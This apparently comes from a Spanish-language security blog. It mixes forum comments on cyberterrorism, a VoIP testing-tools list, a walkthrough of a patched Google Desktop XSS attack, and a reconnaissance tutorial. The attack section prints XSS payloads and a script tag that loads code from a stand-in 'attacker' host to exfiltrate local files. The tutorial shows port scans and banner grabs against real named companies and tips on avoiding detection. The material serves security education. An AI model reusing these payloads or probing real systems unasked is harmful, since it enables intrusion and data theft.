Mi punto es que si confía en otros reclutas, ¿por que no reclutar también a un hacker?

Mi sensación es que muchos cibercriminales empezaron queriendo romper las reglas y terminaron por dinero. Pero pensar en matar es algo muy diferente.
Sobre todo en una persona, que normalmente esta en un mundo cibernético, en donde, mas que un daño físico, se esta acostumbrado a daño económico, moral y/o emocional.
Aunque también es posible, que al estar en un mundo cibernético, en donde no existe un concepto de daño físico tan bien definido, le valga un comino matar a alguien.
(Ejemplo: estudiantes de secundarias en E.E.U.U que han matado a sus compañeros de clase)

Ahora por otro lado.
Apoco en Iraq no hay hackers?
Apoco en Iran no hay hackers?
Apoco en Israel no hay hackers?
Mhh … perdóname ya se me olvido, mhh ¿de donde es CheckPoint?
Ahh …. de Israel!
Pero Israel son “amigos” de E.E.U.U. no hay bronca,
¿Que Irán no fue “amigo” también? Hasta que a E.E.U.U. le convino mejor apañarse su Petróleo.

Para terminar, me quede pensando una película ya vieja, “4 de Dias de Septiembre”, es algo así como “la otra cara de Rojo Amanecer”. Aquí a los estudiantes activistas son de Brasil (no de México), y se les ocurre asaltar un banco y financiar el secuestro de un embajador (el de E.E.U.U., por cierto), que para liberar presos políticos.
El punto es, si lo trasladas de “Estudiante Rojo y Activista”, a “Hacker Activista, en busca de venganza”. ¿Hasta dónde se puede llegar?

Cuando vez reportajes, “no censurados” de la guerra, y del odio y la incertidumbre de las víctimas civiles en dicha guerra, hacia países aliados. Te quedas pensando si un Hacker víctima no buscara como vengarse al respecto.

Todo es cuestión de tiempo, y si Cisco, el FBI, y otros no le dan prioridad, pues mejor para ellos ¿no crees?

Nota final. Es interesante la apreciación del Admirante “Timothy J.
Keating” sobre los terroristas: “are evil incarnated”. ¿Como puedes pedirle que haga la paz con ellos?.

Yo realmente Patrick, creo que la guerra no resuelve nada. Solo genera mas personas en busca de venganza, que entrarán en el mismo calificativo… “Ev…Inc…”

Si tienes retro, seria bueno escucharla señor …

Sin más por el momento me despido,
Saludos,

Fernando Cajeme

Antes que nada y como dicen en el vídeo hay que saber que es Terrorismo, dice la definición de Wikipedia:

Terrorism is a term used to describe violence or other harmful acts committed (or threatened) against civilians by groups or persons for political or ideological goals (fear in latin). Most definitions of terrorism include only those acts which are intended to create fear or “terror”, are perpetrated for an ideological goal (as opposed to a “madman” attack), and deliberately target “non-combatants”.

Bueno, eso como que no sirvió de mucho porque, porque no se especifica en que momento es un activo realmente “violento”, también está el problema de que todos lo que pelean lo hacen porque creen en algo ya sea político o ideológico o NO?, así mismo que el enemigo le tema a uno es una base de todo conflicto o pelea (entre grupos o entre individuos), pero lo peor de todo es que no nos permite discriminar cuando alguien es un revolucionario o cuando lo que sigue es correcto.

Como sea pasando entonces al Ciberterrorismo, creo que eso es medio exagerado, ciertamente es posible usar el internet y en general las computadoras para dañar e incluso matar a alguien, pero eso mismo aplica a una llave de tuercas o un palo de escoba, claro en manos de alguien entrenado o con mucha voluntad o simplemente sin nada que perder las manos mismas pueden ser un arma de destrucción masiva.

Terrorismo actualmente es como vemos las acciones de otros que afectan y de alguna manera intenta destruir nuestro modus vivendi, claro que ahora como tenemos Derechos Humanos y todas esas cosas pues juzgamos con términos más rimbombante las acciones de los que no conocemos.

Finalmente si llamamos ciberterrorismo a actual para difundir o financiar una idea a pesar de otros (si llegar a matar), eso ya existe desde hace mucho, pero si incluimos el matar que para mi es parte importante de un verdadero terrorista, entonces esta mas difícil porque afortunadamente para las cosas que son vitales aun hay modo manual, pero si es posible, solo que nadie tiene tan vacía la cabeza como para empezar el fin del mundo.

Ahora, eso me recuerda un poco a los bárbaros en los tiempos del imperio Romano, los Romanos referían como bárbaros a todos los enemigos

“Por encontra la pregunta a la respuesta y entender la respuesta a la pregunta”

Neko+14

Wikipedia dice lo siguiente:

El Ciberterrorismo o Terrorismo electrónico es el uso de medios de tecnologías de información, comunicación, informática, electrónica o similar con el propósito de generar terror o miedo generalizado en una población o clase dirigente o gobierno, causando con ello una violencia a la libre voluntad de las personas. Los fines pueden ser Económicos, Políticos, Religiosos, o simplemente de odios o prejuicios.

Que no hayan sucedido la cosas no quiere decir que no sean posibles.
Cuando se habla de ciberterrorismo y solamente pensamos en grupos radiales, que están en contra de los gobierno, de la globalización etc. ¿Por qué? no se piensa en gobiernos vs gobiernos, como podemos leer es este link, países como Corea de Norte preparando a hacker especializados para atacar otros gobierno.
Ejemplos de ataques como el que recibieron los servidores raíz de DNS el pasado Febrero, no hace pensar y volver a reflexionar que este mundo es hostil, en este mundo están girando miles de intereses.
Algunas vez te haz puesto a monitorear el trafico que llega a ti desde Internet, cuánto tiempo crees que pase antes de que coloques un Servidor sin parches de seguridad antes de ser comprometido, gusanos como Slammer sigue corriendo por la Internet, buscando a quien dañar. Esto no es ciberterrorismo?.
Siempre me ha gustado como un amigo, m e dice cuando alguien ya no tiene nada que perder en ese momento se vuelve muy peligroso, por qué en ese momento ya no mide las consecuencias de sus actos. Que pasara cuando un experto en seguridad se vuelva loco y no tenga nada que perder. En el pasado se ha podido ver como grandes gobiernes, grandes universidades, he incluso instituciones han sido atacadas por medios cibernéticos y todos han caído, por favor no me digan que no existe el ciberterrorismo, claro que hay pero considero que no estamos consientes de ello.

Darkslaker

http://www.voipsa.org/Resources/tools.php

Esta lista fue desarrollada para mitigar la falta actual de recursos para realizar pruebas de seguridad a la VoIP, tanto para los fabricantes como para los usuarios de VoIP. Se separa en las siguientes siete categorías:

- Herramientas de sniffers de VoIP
- Herramientas de escaneo y enumeración de VoIP
- Herramientas de creación e inundación de paquetes de VoIP
- Herramientas de fuzzing para VoIP
- Herramientas de manipulación de la señalización de VoIP
- Herramientas de manipulación del medio de VoIP
- Herramientas misceláneas

Los principales objetivos de esta lista son:

1. Proporcionar enlaces a las herramientas para ayudar a probar la eficacia de las mejores prácticas en VoIP definidas por ‘VIPSA’s Best Practices Project’.
2. Facilitar la discusión de información de las herramientas de seguridad de VoIP para ayudar a los usuarios a auditar y defender sus dispositivos y desarrollos de VoIP.
3. Proporcionar a los fabricantes la información necesaria para que realicen pruebas de forma pro activa a sus dispositivos de VoIP y valoren su habilidad para funcionar y soportar ataques del mundo real.

Para mayor información de esta lista, es posible escuchar el podcast de Dan York y Jonathan Zar en el Blue Box Podcast #54, y también en el Blue Box Special Edition #16 con Shawn Merdinger disponibles en:

http://www.blueboxpodcast.com.

Google Desktop es una herramienta de escritorio ‘freeware’ popular ofrecida por Google. Tiene una interfase Web simple que hace posible usar el navegador para buscar información en la computadora local.

Existe un método de ataque contra la aplicación de ‘Google Desktop’ que permite a un individuo malicioso lograr acceso remoto y persistente a información sensible así como control completo del sistema afectado.

Este problema es el resultado de la integración entre el sitio Web de Google.com y la falla de Google Desktop al codificar salidas que contengan caracteres maliciosos o inesperados.

Este ataque representa un ejemplo real de una nueva generación de ataques a las computadoras. Estos ataques toman ventaja de las vulnerabilidades en aplicaciones Web y el poder cada vez mayor de los navegadores Web. El propósito es acceder remotamente a información privada. A diferencia de los ataques de penetración tradicionales, en este caso no hay necesidad de inyectar código binario.

En este ataque se utiliza código de JavaScript para controlar la funcionalidad de Google Desktop. El atacante puede secuestrar información confidencial del sistema y evadir los sistemas de protección de información como antivirus y firewalls.

El ataque pone énfasis en el peligro de la integración entre aplicaciones de escritorio y aplicaciones basadas en Web, ya que abre un hueco para los atacantes maliciosos al escalar sus privilegios al cruzar del ambiente Web al ambiente de escritorio.

Google Desktop

La aplicación de Google Desktop puede indexar y manejar una gran variedad de recursos incluyendo documentos de Office, archivos multimedia, archivos comprimidos, cache de historial Web, y sesiones de chat. Es posible también indexar y manejar documentos protegidos con contraseña y páginas web encriptadas, aunque estas características están deshabilitadas por default.

Google Desktop también puede monitorear la actividad del usuario al revisar y editar archivos, escribir y leer correos electrónicos y navegar por la Web. Crea copias en cache de la información y permite al usuario acceder a ella en otro momento. Por esta razón es posible buscar y acceder a la información desde el cache incluso después de que el correo electrónico original o archivo ya no exista en el sistema.

Google Desktop corre como un servidor Web local que esta ligado al puerto 4664 en la interfase de red del equipo local. Por seguridad, sólo responde a las solicitudes originadas desde el equipo local.

Integración de Google Desktop y el sitio público de Google.com

Un característica de la aplicación de Google Dektop es su similitud con el sitio Web de Google.com. Cuando se realizan búsquedas de información utilizando Google.com, además de presentar los resultados Web también se presentan los resultados que proporciona Google Desktop. Estos resultados de búsquedas locales los realiza la aplicación local de Google Desktop.

Esta característica puede resultar muy útil pero representa un grave riesgo de seguridad. Si se explota una vulnerabilidad de Cross Site Scripting (XSS) en Google.com contra un usuario de Google Desktop, un atacante malicioso puede acceder la porción local de la información de la computadora.

Este riesgo es mitigado en las versiones más actuales de Google Desktop ya que:

1. La integración de los resultados de Google Desktop con Google.com es opcional. Se puede deshabilitar mediante la opción de ‘Display’ en la ventana de ‘Desktop Preferences’.
2. Los resultados de la integración son parciales, solo se muestra un pequeño texto al usuario. Los contenidos completos del resultado únicamente pueden ser accedidos mediante la interfase local de Google Desktop.

Mecanismos de Protección

1. Filtrado de conexiones. El servidor Web corre en el equipo local por el puerto 4664. Únicamente maneja conexiones que se originen de y hacia el equipo local 127.0.0.1.
2. Firmas de protección. Cuando se instala, Google Desktop genera un llave aleatoria de 64 bits que se guarda en el registro fuse_data. Esta llave se utiliza para crear firmas únicas para diferentes páginas Web en el servidor Web local. Cada petición al servidor de Google Desktop local debe contener la firma para la petición específica. Esta firma cambia en cada equipo y en cada página Web. Este mecanismo de firmas proporciona una defensa contra ataques de XSS o Cross Site Request Forgery (CSRF). Para poder explotar esas vulnerabilidades, el atacante necesitaría conocer la firma válida del script vulnerable en el equipo local.

Vulnerabilidad de XSS en Google Desktop

La aplicación de Google Desktop permite al usuario realizar búsquedas de distintas formas. Una de ellas es la búsqueda de información bajo directorios específicos en el disco duro o en un dispositivo en red. Esta característica se puede configurar en la página de ‘Advanced Search’.

Se utiliza el parámetro under para realizar este tipo de búsquedas. El parámetro under puede ser pegajoso ya que los tres anteriores peticiones de under se regresan en la página de resultados. El parámetro de búsqueda under contiene una vulnerabilidad ya que es posible ejecutar scripts maliciosos utilizándolo. Por ejemplo:

under:<script>alert(‘Hacked’) :</script>

Para hacer la experiencia de navegación más rápida en el sitio Web de Google Desktop, las respuestas de las búsquedas relacionadas de Google Desktop contienen los contenidos de la página de ‘Advanced Search’ aunque se encuentran ocultos visualmente al usuario. Cuando el usuario da click en el enlace de ‘Advanced Search’ dentro de una página de búsqueda, está es cargada inmediatamente sin enviar una solicitud al servidor Web de Google Desktop.

Debido a que los parámetros de búsquedas avanzadas se incluyen en todas las páginas de búsqueda, desde el momento en que se ejecuta el comando under malicioso en la aplicación de Google Desktop, se queda pegado. Cada que un usuario realice una búsqueda por medio de la interfase Web de Google Desktop, el código malicioso de JavaScript también se ejecutará en el fondo.

Descripción del ataque

Este ataque puede saltarse los mecanismos de protección mencionados anteriormente y permitir a un atacante insertar código de JavaScript Malicioso en Google Desktop. Esto se realiza al tomar ventaja de la integración de Google Desktop con el sitio Google.com, así como de la vulnerabilidad de XSS descubierta en el parámetro under.

1. Explotar una vulnerabilidad de XSS en Google.com para incluir el código de JS. El vector inicial de ataque es la explotación de cualquier vulnerabilidad de XSS que se encuentre en el dominio de Google.com. El año pasado se descubrieron múltiples vulnerabilidades dentro de las aplicaciones y sitios de Google. La víctima debe acceder a una URL especialmente elaborada que apunte a una página Web vulnerable en: http://www.google.com. Esto se pude realizar al engañar al usuario para que de clic en el link malicioso utilizando ingeniería social o al tomar ventaja de las vulnerabilidades Web de otros sitios como lo que realizan los gusanos Samy y Yamanner. Después de que la víctima carga la página con la vulnerabilidad de XSS, se ejecuta el código malicioso de JavaScript. Este es el clásico ataque en Google.com que permite al atacante controlar el navegador de la víctima. La limitación es que el script únicamente puede interactuar con el dominio de Google.com.
2. Enviar una búsqueda estándar a Google.com en el fondo. En este paso, el código malicioso de JavaScript trata de encontrar la firma única de la página de búsquedas de Google Desktop que se encuentra instalada localmente. Envía una solicitud que corre en el fondo a Google.com, utilizando el objeto XmlHttpRequest. Por ejemplo: http://www.google.com/search?q=Nimrod.
3. Se adquiere la firma de la página de búsquedas de Google Desktop. Cuando se obtiene una respuesta de Google.com, la aplicación de Google Desktop la intercepta y agrega un enlace a Google Desktop. Este enlace tiene la siguiente estructura: http://127.0.0.1:4664/search&s=<UNIQUE_SIGNATURE>?q=<QUERY_STRING>

Utilizando expresiones regulares, el código malicioso que se inyecto en el paso 1, obtiene la firma única que es utilizada para el enlace de Google Desktop. Esta expresión regular puede tener la siguiente forma: ‘http://127.0.0.1:4664/search&s=([^?]+)?q=[^’]+’
Que se utiliza para obtener la firma única.

1. Infectar el navegador de la víctima. En este paso final el código de JavaScript salta al contexto de Google Desktop y lo infecta con un código malicioso y pegajoso de JavaScript. Esto se realiza al reemplazar la cadena estándar de búsqueda con la referencia maliciosa de JavaScript y al enviar una solicitud ciega (utilizando el IFRAME invisible por ejemplo) al Google Desktop:

http://127.0.0.1:4664/search&s=<UNIQUE_SIGNATURE>?q=<MALICIOUS_QUERY_STRING>
se transforma en:
http://127.0.0.1:4664/search&s=<STEP_3_ACQUIRED_SIGNATURE>?q=under:”<script src=’http://attacker/infect.js’></script>”
La respuesta a la solicitud ciega se carga en el IFRAME invisible y el código de JavaScript es ejecutado. En este punto el atacante tiene un control completo y persistente de la aplicación de Google Desktop de la víctima. El atacante puede realizar búsquedas de información privada en el equipo víctima y enviársela a http://attacker.

Características del ataque

La naturaleza de la vulnerabilidad explotada en este ataque permite al atacante instalar malware de JavaScript persistente. Cada vez que la víctima realice búsquedas utilizando Google Desktop, el script malicioso se ejecutará en el fondo sin llamar la atención. Ya que el payload malicioso es un código pequeño de HTML, se fusiona sin ser notado, dentro del código HTML legítimo del Google Desktop.

Control remoto. El malware de JavaScript puede ser controlado remotamente al cargar comandos dinámicos de un sitio Web externo utilizando la directiva de inclusión de JavaScript: <script src=’http://attacker/infect.js’>. Es posible utilizar plataformas como XSS Proxy para establecer comunicación bidireccional entre los equipos atacados y el atacante.

Control persistente. El malware de JavaScript se coloca como una de las últimas búsquedas del parámetro under. Si el usuario utiliza la búsqueda under varias veces seguidas, el script puede ser quitado del histórico. Sin embargo, para asegurarse de que el malware no es removido por las utilización del parámetro under del usuario, se puede configurar el código malicioso para que reinfecte el sistema cada vez que detecte la utilización del parámetro under. Esto se puede realizar al activar una búsqueda en Google Desktop que corra oculta.

Comportamiento tipo virus. El ataque afecta a la computadora local de la víctima y tiene un impacto similar a un virus/malware binario de computadoras. Sin embargo, difiere de los ataques tradicionales por varias razones:

1. El código malicioso no reside en el disco duro como un archivo binario que pueda atraer la atención de la víctima.
2. El atacante no necesita formas sofisticadas para cargar la lógica maliciosa; esto se realiza automáticamente por el navegador cada vez que se visitan páginas de Google Desktop.
3. El código malicioso es ejecutado por el navegador. No corre como un proceso propio.
4. Actualmente los antivirus y firewalls no pueden bloquear ataques de malware de JavaScript. El código malicioso puede mutar y encriptarse para evadir IDS.
5. Es posible extraer información de la computadora local y hacer que parezca como solicitudes codificadas a un sitio Web externo.

Impacto

Poder realizar búsquedas en la computadora local. Incluyendo documentos de Office, multimedia, correos (incluso los borrados), cache de historial Web, sesiones de Chat, cronología de actividades realizadas por el usuario en el equipo. Es posible hacer búsquedas por las palabras ‘confidencial’ o ‘secreto’ para encontrar información confidencial; búsquedas por ‘username’ o ‘password’ para obtener contraseñas; búsquedas por ‘banco’ para obtener información bancaria. La opción de ‘TimeLine View’ de Google Desktop presenta un log cronológico de los archivos editados por el usuario y los sitios Web visitados, así como versiones en cache de ambos.

Habilitar características deshabilitadas en Google Desktop. Las características que mayor impacto tienen en la seguridad son las siguientes: ‘Password-protected Office Documents’ permite a Google Desktop indexar archivos protegidos por contraseña. ‘Secure Pages /HTTPS in Web history’ permite a Google Desktop indexar páginas web seguras. Existe una vulnerabilidad de Google Desktop que puede ser utilizada para esconder estos cambios y que el usuario no pueda notarlos.

Búsqueda entre computadoras. Permite buscar páginas Web y documentos entre todas las computadoras de la víctima. Para activar esta característica se requiere que todas la máquinas tengan Google Desktop instalado y una cuenta de Google.

Control completo del sistema. Es posible lanzar aplicaciones por medio de la interfase Web de Google Desktop. Al enviar una solicitud desde Google Desktop se puede forzar al sistema atacado para que abra archivos automáticamente con su aplicación asociada. Es posible ejecutar archivos de tipo .exe. Por ejemplo: filetype:exe winword

Recomendaciones

1. Google desarrollo un parche que mitiga este ataque. Se recomienda actualizar la versión de Google Desktop.
2. Se deben evaluar los parámetros de seguridad del navegador Web.
3. Se debe deshabilitar la integración entre las aplicaciones Web públicas y las aplicaciones de escritorio.
4. Los vendedores de antivirus deben tomar en cuenta este riesgo y desarrollar formas creativas de detectar y defender contra este tipo de ataques de malware JavaScript.

Conclusiones

Por varias razones este ataque se puede considerar casi perfecto:

1. El footprint es pequeño y prácticamente indetectable.
2. Lo firewalls no pueden hacer nada para mitigar el ataque o el envío de información confidencial.
3. El software de antivirus no puede proteger a la víctima
4. El ataque es persistente entre diferentes sesiones y navegadores.
5. El impacto potencial es el control completo de la computadora víctima.

Este ataque fue posible gracias a una sola vulnerabilidad de XSS y a la integración entre el sitio de Google.com y la aplicación local de Google Desktop. Mientras que el ataque de XSS se considera inofensivo, combinado con aplicaciones de alta sensibilidad y capacidades poderosas como Google Desktop, su impacto se hace muy alto.

Referencias:
http://www.watchfire.com/resources/Overtaking-Google-Desktop.pdf
http://download.watchfire.com/googledesktopdemo/index.htm

Servicios públicos ofrecidos.

Ahora que conocemos los segmentos de red de una organización podemos conocer los servicios públicos ofrecidos. Lo primero que debemos hacer es echar una mirada a los nombres de los equipos que pudimos identificar en la fase anterior. Muchos administradores de red, ponen nombres significativos a sus equipos, estos nombres van relacionados con la función que desempeñan, algunos ejemplos son:

ns.dominio.com = Servidor DNS
dns.dominio.com = Servidor DNS
www.dominio.com = Servidor http
smtp.dominio.com = Servidor de correo.
Mail.dominio.com = Servidor de correo.
fw.dominio.com = firewall

ns.dominio.com = Servidor DNS
dns.dominio.com = Servidor DNS
www.dominio.com = Servidor http
smtp.dominio.com = Servidor de correo.
Mail.dominio.com = Servidor de correo.
fw.dominio.com = firewall

Si queremos no ser detectados (o hacer más difícil el rastreo) por administradores de red debemos tener mucho cuidado en esta parte, la clave para investigar los servicios públicos está en no simplemente enviar miles de paquetes generados con la herramienta nmap a todos los puertos y a todos los segmentos de red; mas bien podemos buscar por equipos y guiarnos por la información que tenemos actualmente para tratar de identificar que servicios ofrecen públicamente y únicamente lanzar el escaneo a esos puertos.

Los servicios públicos más comunes con los que cuentan la mayoría de las organizaciones se listan a continuación:

Por ejemplo, mediante la resolución de dominios encontré el siguiente dominio

portal2www.itesm.mx.

¿Que puedo hacer ahora? lanzar un escaneo a los puertos mas comunes y ver su respuesta.
Esto se puede hacer con n cantidad de escaners, en mi opinión nmap y unicornscaner son los mejores:

El nombre del host tiene www, por lo que es de suponerse que debe tener habilitado http y posiblemente https. Con el siguiente comando lanzaremos un escaneo utilizando la herramienta unicornscan al sitio portal2www.itesm.mx pero únicamente a los puertos 80 (http) y 443 (https):

# unicornscan -mT portal2www.itesm.mx.:80,443 -v
TCP open http[ 80] from 200.34.200.27 ttl 54
TCP open https[ 443] from 200.34.200.27 ttl 54

Como ya lo suponíamos, basados en el nombre del equipo, comprobamos que ambos puertos se encuentran abiertos. Si queremos lanzar un escaneo a los puertos más comunes mencionados en la lista anterior, con unicornscaner se haría de la siguiente forma:

# unicornscan -mT portal2www.itesm.mx.:q
TCP open ssh[ 22] from 200.34.200.27 ttl 54
TCP open http[ 80] from 200.34.200.27 ttl 54
TCP open https[ 443] from 200.34.200.27 ttl 54

De esta manera podemos comenzar a reconocer los servicios públicos que ofrece una organización. Pero no solo nos interesa conocer los servicios públicos que ofrece una organización, sino también las versiones de servidores que tienen, esto para realizar un análisis más específico y poder reconocer vulnerabilidades en los equipos:

Nmap nos permite hacer esto de una manera transparente:

La sintaxis seria: ‘nmap –sV –P0 –p Puerto IP’

# nmap -sV -P0 -p 80,443 www.eluniversal.com.mx

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2006-08-08 00:04 GMT
Interesting ports on na-148-243-168-46.na.avantel.net.mx (148.243.168.46):
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.0.54 ((Unix) PHP/5.0.5)
443/tcp filtered https

Nmap finished: 1 IP address (1 host up) scanned in 8.164 seconds

Si deseamos hacer esta búsqueda de banner y encontrar posibles versiones de servicios, lo podemos hacer simplemente con aplicaciones como netcat o telnet y conectarnos al puerto que necesitemos. Es importante mencionar que los banners no son una garantía que realmente este corriendo en el servidor tal versión de un software, muchas veces, por seguridad, los administradores del sistema pueden modificar el contenido del banner de sus equipos.

A continuación muestro un ejemplo de obtener un banner de https con openssl que es una herramienta de código abierto para establecer conexiones de ssl y tls.

# openssl s_client -quiet -connect www.banamex.com.mx:443
depth=2 /C=US/O=VeriSign, Inc./OU=Class 3 Public Primary Certification Authority
verify error:num=19:self signed certificate in certificate chain
verify return:0
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 14 Aug 2006 00:23:02 GMT
Content-length: 0
Content-type: text/html
Connection: close

El siguiente es un ejemplo de una obtención de banner de SMTP con netcat.

#nc mail.rosenblueth.mx 25
220 mail.rosenblueth.mx ESMTP Sendmail 8.11.6/8.11.6; Wed, 13 Dec 2006 10:36:31 -0600

La siguiente es una obtención de banner de telnet con un telnet (XD).

# telnet 200.39.31.1
ÿûÿûÿýÿýC
______________________________________________________________

|| ||
|| ||
|||| ||||
..:||||||:..:||||||:..
C i s c o S y s t e m s
Router de Acceso
______________________________________________________________
**************************************************************
* *
* TELEFONICA DATA MEXICO S.A DE C.V. *
* *
* ” GESTION DE RED ” *
* *
* EL ACCESO A ESTE EQUIPO ESTA RESTRINGIDO AL *
* PERSONAL AUTORIZADO DE LA EMPRESA *
* SI TIENES DUDAS PONTE EN CONTACTO CON NOSOTROS AL TEL. *
* (52) 3093-6904 *
* (52) 5249-9949 *
* *
* gestion.red@telefonica-data.com.mx *
* *
**************************************************************

User Access Verification

Username:

Arquitectura de los sistemas visibles.

¿Que representa tener la arquitectura?, con toda la información que tenemos actualmente, ya podemos generar un mapa de la red objetivo: contamos con el direccionamiento, los servicios públicos y la mayoría de las versiones de las aplicaciones que se encuentren en el sistema. Con la información que se ha recabado es posible definir si se cuenta con balanceadores de carga, diferentes ISP, que servicios están forwardeados (enviados a diferentes equipos en la DMZ o red interna con la misma IP pública), así como la alta disponibilidad de algunos servicios.

Con la información obtenida en fuentes publicas, como ofertas de empleo, podemos notar que tipo de tecnologías piden al personal para contratar y al identificar banners de equipos podemos saber el tipo y arquitectura de las plataformas que manejan en la red de la compañía objetivo.

¿Como identificamos que servicios están reenviados a otros equipos?, esto puede ser verificado por el TTL (http://es.wikipedia.org/wiki/Tiempo_de_Vida ) al enviar paquetes a ellos.

El siguiente un escaneo a los puertos 80 y 443

# unicornscan -mT www.banamex.com.mx:80,443
TCP open http[ 80] from 192.193.230.100 ttl 49
TCP open https[ 443] from 192.193.230.100 ttl 51

Los diferentes TTL nos indican que el Puerto 80 esta a dos saltos mas que el puerto 443, esto quiere decir que físicamente los servicios no se encuentran en el mismo equipo.

Para identificar diferentes proveedores de servicios para enlaces redundantes podemos trazar las rutas de los paquetes tanto por TCP, UDP como ICMP.

Las trazas de los paquetes también debemos hacerlas desde diferente partes del mundo para esto podemos ir a la pagina http://www.traceroute.org/ .

El siguiente es una trace de puerto 53 UDP con traceroute

# traceroute -p 53 -v -n 4.2.2.2 -p 1
traceroute to 4.2.2.2 (4.2.2.2), 30 hops max, 38 byte packets
1 192.168.244.1 36 bytes to 192.168.244.121 14.416 ms 7.792 ms 3.866 ms
2 192.168.244.20 46 bytes to 192.168.244.121 2.578 ms 3.484 ms 5.509 ms
3 200.36. bytes to 192.168.244.121 3.777 ms 3.717 ms 7.381 ms
4 200.36. bytes to 192.168.244.121 8.536 ms 5.027 ms 5.316 ms
5 200.38. bytes to 192.168.244.121 36.470 ms 31.229 ms 16.789 ms
6 201.125.72.210 36 bytes to 192.168.244.121 19.668 ms 33.953 ms *
7 200.38.132.85 36 bytes to 192.168.244.121 67.067 ms 75.708 ms 131.794 ms
8 12.119.9.13 36 bytes to 192.168.244.121 69.091 ms 88.645 ms 117.376 ms
9 12.123.222.102 148 bytes to 192.168.244.121 90.758 ms 86.053 ms 88.856 ms
10 12.123.222.29 36 bytes to 192.168.244.121 61.226 ms 155.555 ms 66.113 ms
11 4.68.111.189 36 bytes to 192.168.244.121 68.052 ms * 104.762 ms
12 4.68.102.135 36 bytes to 192.168.244.121 130.495 ms 155.040 ms 139.991 ms
13 4.2.2.2 46 bytes to 192.168.244.121 44.472 ms 89.933 ms 156.602 ms

El siguiente es una trace de puerto 53 TCP con tctrace

# tctrace -i eth0 -d 4.2.2.2 -p 53
1(2) [192.168.244.1]
2(1) [192.168.244.20]
3(1) [200.36.]
4(1) [200.36.]
5(1) [200.38.]
6(1) [201.125.72.210]
7(1) [200.38.132.85]
8(1) [12.119.9.13]
9(1) [12.123.222.102]
10(1) [12.123.222.29]
11(1) [4.68.111.189]
12(1) [4.68.102.7]
13(1) [4.2.2.2] (reached; closed)

Si comparamos los saltos hasta el 11 podemos ver que son iguales, después del equipo 4.68.11.189 siguen por diferentes caminos.

Enviando paquetes ICMP para ver estadísticas podemos reconocer otra ruta diferente:

C:Documents and Settingsdarkslaker>pathping 4.2.2.2

Tracing route to vnsc-bak.sys.gtei.net [4.2.2.2] over a maximum of 30 hops:
0 narc [192.168.244.120]
1 192.168.244.1
2 192.168.244.20
3 200.36.
4 200.36.
5 200.38.
6 201.125.72.210
7 200.38.132.85
8 12.119.9.13
9 12.123.222.102
10 12.123.222.29
11 4.68.111.189
12 4.68.102.71
13 4.2.2.2

Computing statistics for 325 seconds…
Source to Here This Node/Link
Hop RTT Lost/Sent = Pct Lost/Sent = Pct Address
0 narc [192.168.244.120]
1/ 100 = 1% |
1 9ms 6/ 100 = 6% 5/ 100 = 5% 192.168.244.1
0/ 100 = 0% |
2 14ms 7/ 100 = 7% 6/ 100 = 6% 192.168.244.20
0/ 100 = 0% |
3 13ms 1/ 100 = 1% 0/ 100 = 0% 200.36.
0/ 100 = 0% |
4 11ms 8/ 100 = 8% 7/ 100 = 7% 200.36.
0/ 100 = 0% |
5 — 100/ 100 =100% 99/ 100 = 99% 200.38.193.226
0/ 100 = 0% |
6 — 100/ 100 =100% 99/ 100 = 99% 201.125.72.210
0/ 100 = 0% |
7 — 100/ 100 =100% 99/ 100 = 99% 200.38.132.85
0/ 100 = 0% |
8 107ms 3/ 100 = 3% 2/ 100 = 2% 12.119.9.13
0/ 100 = 0% |
9 — 100/ 100 =100% 99/ 100 = 99% 12.123.222.102
0/ 100 = 0% |
10 — 100/ 100 =100% 99/ 100 = 99% 12.123.222.29
0/ 100 = 0% |
11 104ms 6/ 100 = 6% 5/ 100 = 5% 4.68.111.189
0/ 100 = 0% |
12 111ms 6/ 100 = 6% 5/ 100 = 5% 4.68.102.71
0/ 100 = 0% |
13 119ms 1/ 100 = 1% 0/ 100 = 0% 4.2.2.2

Trace complete.

Se identifico en el salto 12 un nuevo equipo.

El identificar y seguir los caminos que nuestros paquetes tienen que viajar hasta llegar a su destino nos brinda mucha información valiosa. Por lo que es importante siempre verificar los caminos de paquetes TCP, UDP e ICMP.

Existen también algunas otras cosas que podemos verificar para realizar un mapa mas completo de la tecnología que usa una organización, por ejemplo, se pueden intentar técnicas de rebote de correo electrónico, que consisten en enviar un correo electrónico a un destinatario que no existe y con la respuesta automática del sistema se puede encontrar información como el tipo de servidor de SMTP y la versión del software antivirus etc.

Para identificar si un equipo se encuentra detrás de un loadbalancer (balanceador de carga) en aplicaciones Web, podemos usar el siguiente script:

#!/usr/bin/perl
# Enumerate web servers behind a load balancer
# 20020125 Mike Shema
$url = “/scripts”;
$n = 10;
if ($#ARGV print “Usage: $0 [URL] [repetitions]n”;
exit;
}
$host = $ARGV[0];
$url = $ARGV[1] if ($ARGV[1]);
$n = $ARGV[2] if ($ARGV[2] !~ /D+/);
$cmd = “echo -e “GET $url HTTP/1.0nn” | nc $host 80″;
for($i=0; $i $res = `$cmd`;
$res =~ /(.*http://)(.*)(/w+)/g;
print “$2n” if ($2);
}

# perl load_balancer.pl www.microsoft.com /mexico 5
207.46.19.30
207.46.225.60
207.46.198.60
207.46.20.30
207.46.20.60

Simplemente necesitamos conocer un directorio del portal, para utilizar este script.

El reto de seguir el rastro a una organización es muy grande y esta fue simplemente una pequeña mirada a lo que se puede realizar. Ahora depende de cada persona; su feeling y su experiencia le permitirán obtener diferentes datos o encontrar maneras más óptimas y refinadas de búsqueda.

Cualquier comentario favor de hacérmelo llegar:

rienzi@nimrod.com.mx

Nombres de Dominio de la organización:
Para un hacker, el conocer la mayor información relacionada con la organización antes de lanzar un ataque es indispensable. Dentro de la información que es necesaria recopilar encontramos:

• Nombres de dominio de la organización.
• Bloques de red y direccionamiento IP de la organización.
• Proveedores de servicio de Internet de la organización.

A continuación se muestran algunas maneras de localizar dicha información.
Primeramente es importante mencionar que el ICANN es responsable de la coordinación y de la administración de los elementos técnicos de DNS’s para garantizar una resolución unívoca de los nombres, de manera que los usuarios de Internet puedan encontrar todas las direcciones válidas. Para ello, se encarga de supervisar la distribución de los identificadores técnicos únicos usados en las operaciones de Internet, y delegar los nombres de dominios de primer nivel (como .com, .info, etc.).
ICANN se encarga de administrar los nombres de dominio y direccionamiento IP mediante organizaciones alrededor de mundo. Las siguientes ligas corresponden a la representación de ICANN por regiones:

• Europa y África http://www.ripe.net
• Norte y Sur América http://www.arin.net
• Asia Pacifico http://www.apnic.net
• http://www.ripe.net

